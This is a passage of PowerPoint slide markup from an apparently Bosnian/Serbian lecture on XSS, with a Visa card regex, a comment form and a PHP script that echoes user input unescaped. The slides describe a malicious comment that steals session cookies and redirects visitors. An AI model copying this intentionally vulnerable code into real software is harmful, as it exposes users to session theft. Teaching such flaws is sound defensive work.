                          <a:latin typeface="Courier New" panose="02070309020205020404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/^(4[0-9]{12}(?:[0-9]{3})?)*$/</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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Visa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kreditne</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0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555555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kartice</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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65" marR="126365" marT="126365" marB="126365" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4191813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66759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F5973-451A-40A3-A465-E6CE37371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Site Scripting – XSS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A58C0-883D-4F15-99E0-E2FF08090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371600"/>
            <a:ext cx="7194550" cy="47704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/>
              <a:t>XSS je tip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sigurnosnih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>propusta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je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>karakterističan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> za web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>aplikacije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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>omogućava</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>napadaču</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ubaci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kôd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se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izvršava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klijentskoj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>strani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> (JavaScript, ActiveX, HTML) u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>našu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>stranicu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Cilj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ovakvog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>napada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>dobijanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>osjetljivih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što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:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korisničke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sesije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> (cookie) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>odvođenje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drugu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>stranicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>bilo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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>drugi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>cilj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se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>može</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>postići</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izvršenjem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koda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korisničkoj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>strani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dirty="0"/>
              <a:t>XSS-u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najčešće</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>podložne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>aplikacije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ispisuju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korisnički</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sadržaj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> –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primjer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>forumi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>knjige</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>gostiju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>komentari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>članova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druge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="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7418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147F8-F48A-4E11-A38F-473277EB9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Primjer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross Site Scripting – XSS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452D3-033C-4986-B708-062F17732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066800"/>
            <a:ext cx="7194550" cy="5075238"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Sledeći</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>primjer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>opisuje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>napad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stranicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ispisuje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>komentare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>članova</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Ukoliko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> bi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>imali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>formu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>upis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>komentara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sličnu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ovoj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>skripta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ispisuje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>komentar</a:t>
            </a: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 err="1"/>
              <a:t>Definitivno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>imamo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ozbiljan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sigurnosni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>propust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>?!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0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800F63-A833-4AF0-8E87-8467DD045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09800"/>
            <a:ext cx="8543925" cy="1524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&lt;form action="komentar.php" method="POST" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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Vaše ime: &lt;input type="text" name="ime" /&gt;&lt;br /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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Komentar: &lt;textarea name="komentar" rows="10" cols="60"&gt; &lt;/textarea&gt;&lt;br /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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&lt;input type="submit" value="Upišite komentar" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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31F4A9-B473-4F39-9E54-8485089B2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237" y="4267200"/>
            <a:ext cx="8543925" cy="1066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&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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echo "&lt;p&gt;$ime je napisao:&lt;br /&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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echo $komentar ."&lt;/p&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-B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38908269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0E478-E1C1-417F-875B-D93089E3C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Primjer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross Site Scripting – XSS…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5D18A-7900-4DBC-AD45-09C216BAC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066800"/>
            <a:ext cx="7194550" cy="50752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Korisnik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>može</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>upisati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>komentar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ali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dodati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>neće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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>vidljiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> od </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>strane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>drugih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korisnika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Komentar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kojim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>napadač</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>može</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ukrasti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>podatke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sesiji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>čuvaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>cookiu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sledeći</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600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r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> bi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bilo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korisnik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>posjetio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ovu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stranu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sadrži</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>komentar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ovim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kôdom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>biće</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>preusmjeren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drugu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>adresu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>samo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da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svi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>naši</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korisnici</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>otići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neki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>drugi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sajt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>već</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>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napadač</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>moći</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>pristupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>našim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kolačićima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>preko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> GET </a:t>
            </a:r>
            <a:r>
